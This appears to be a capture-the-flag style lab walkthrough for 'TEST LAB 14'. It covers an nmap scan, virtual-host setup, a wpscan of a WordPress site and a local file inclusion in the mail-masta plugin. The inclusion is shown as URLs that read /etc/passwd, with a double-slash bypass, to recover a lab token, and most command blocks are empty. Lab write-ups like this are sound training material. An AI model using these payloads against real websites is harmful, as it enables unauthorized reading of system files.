Let’s start this awesome adventure!
You can start there > TEST LAB 14
We have 2 entry points addresses :
1 |
|
Let’s enumerate 192.168.101.14
first.
As always let’s start with a nmap scan.
1 |
|
Let’s start with port 80, when we visit the webpage we get this error :
1 |
|
Why is happening this ?
Because of webserver virtual hosts.
vitrual hosts
-> allows you to run more than one website on a single machine.
When we browse a machine using a domain name for example test.vulnhub
the webserver will direct you to the content based on the host header. If we don’t do this and browse the machine with raw IP address, that header won’t be set properly and you’ll get a default page or error page.
We need to add this hostname into /etc/hosts
/etc/hosts
-> translate hostnames to IP addresses
For windows users u can find it there -> c:\windows\system32\drivers\etc\hosts
We can aso use hosts file because it’s easier to remember the hostname/domain than the IP address.
Let’s add it.
1 |
|
Now we can see a wordpress site!
1 |
|
Let’s run wpscan
1 |
|
Let’s search for possible exploits.
1 |
|
Let’s test it out.
http://site.test.lab/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
Gives us an error message hmm.. we can bypass that using //
double slash.
That is an error probably in the developer’s code.
http://site.test.lab/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=//etc//passwd
In the end we can see this token_hrTY9s4Cv
, we got it!
Site Token -> hrTY9s4Cv
See you, in the next step!